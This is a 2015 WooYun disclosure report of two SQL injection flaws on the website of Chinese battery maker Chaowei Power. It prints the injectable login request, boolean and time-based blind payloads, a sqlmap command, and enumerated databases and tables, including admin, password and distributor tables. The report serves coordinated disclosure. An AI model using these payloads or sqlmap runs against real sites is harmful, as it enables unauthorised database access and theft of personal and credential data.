当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162553

漏洞标题:中国500强之超威动力控股主站两处SQL注入一枚,泄露全部经销商详细信息/管理员/DBA权限

相关厂商:超威动力控股有限公司

漏洞作者: 逆流冰河

提交时间:2015-12-19 15:26

修复时间:2016-02-04 17:47

公开时间:2016-02-04 17:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-19: 细节已通知厂商并且等待厂商处理中
2015-12-23: 厂商已经确认,细节仅向厂商公开
2016-01-02: 细节向核心白帽子及相关领域专家公开
2016-01-12: 细节向普通白帽子公开
2016-01-22: 细节向实习白帽子公开
2016-02-04: 细节向公众公开

简要描述:

超威电源有限公司创立于1998年,是一家专业从事动力型和储能型蓄电池研发、制造、销售的高新技术企业。现为中国电池工业协会常务理事、中国电池工业协会铅酸蓄电池分会副理事长、中国电器工业协会全国铅酸蓄电池分会副理事长、中国化学与物理电源协会常务理事、中国电工技术学术铅酸蓄电池专业委员会副主任委员、全国铅酸蓄电池标准化技术委员会委员、浙江省蓄电池行业协会副会长、浙江省自行车行业协会副理事长单位。

详细说明:

1,注入点:

GET http://**.**.**.**/controller/contro.php?action=login_check&login_username=admin*&login_password=admin&m=0.9825822759885341 HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Referer: http://**.**.**.**/supply_login.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=2mv0kevm0jh098onp75gecjto3; Hm_lvt_54dfe0afecdf5288fc4d0944471ddf68=1450440662; Hm_lpvt_54dfe0afecdf5288fc4d0944471ddf68=1450441394


2,注入信息
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://**.**.**.**:80/controller/contro.php?action=login_check&login_username=admin' AND 1156=1156 AND 'XlhF'='XlhF&login_password=admin&m=0.9825822759885341
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://**.**.**.**:80/controller/contro.php?action=login_check&login_username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))CBSR) AND 'PugL'='PugL&login_password=admin&m=0.9825822759885341
---
[21:34:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
available databases [5]:
[*] cnchaowei
[*] cnchaowei_en
[*] information_schema
[*] mysql
[*] performance_schema
3,表信息
Database: cnchaowei
+------------------+---------+
| Table | Entries |
+------------------+---------+
| tb_manyi | 203554 |
| tb_zijian | 10605 |
| tb_goumai | 2621 |
| tb_guzhang | 2057 |
| tb_content | 1555 |
| tb_postmail | 1217 |
| tb_jingxiaoshang | 802 | ---->经销商
| tb_fankui | 516 |
| tb_network_class | 472 |
| tb_admin | 86 | ---->管理员
| tb_admin_cate | 20 | ---->管理员密码
| tb_ppic | 18 |
| tb_content_class | 17 |
| tb_supply | 11 |
| tb_ips | 10 |
| tb_ping | 10 |
| tb_chanye_class | 7 |
| tb_procon | 5 |
| tb_shenhe | 2 |
| tb_mail_server | 1 |
| tb_seo | 1 |
| tb_seo_class | 1 |
+------------------+---------+
4,不深入了,对了,是dba权限

漏洞证明:

1,注入点:sqlmap -u "http://**.**.**.**/en/newsEvents1.php?id=184" --batch
2,注入信息:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=184 AND 8434=8434
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=184 AND (SELECT * FROM (SELECT(SLEEP(5)))QTLr)
---
[22:05:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
available databases [5]:
[*] cnchaowei
[*] cnchaowei_en
[*] information_schema
[*] mysql
[*] performance_schema
3,表信息
Database: cnchaowei_en
+------------------+---------+
| Table | Entries |
+------------------+---------+
| tb_fankui | 47645 |
| tb_network_class | 472 |
| tb_content | 111 |
| tb_guzhang | 71 |
| tb_zijian | 68 |
| tb_goumai | 40 |
| tb_admin | 34 |
| tb_jingxiaoshang | 27 |
| tb_ping | 22 |
| tb_ppic | 18 |
| tb_content_class | 17 |
| tb_chanye_class | 7 |
| tb_postmail | 6 |
| tb_manyi | 5 |
| tb_procon | 5 |
| tb_admin_cate | 3 |
| tb_shenhe | 2 |
| tb_mail_server | 1 |
| tb_seo | 1 |
| tb_seo_class | 1 |
+------------------+---------+
4,不在深入

修复方案:

Fix

版权声明:转载请注明来源 逆流冰河@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-23 20:09

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无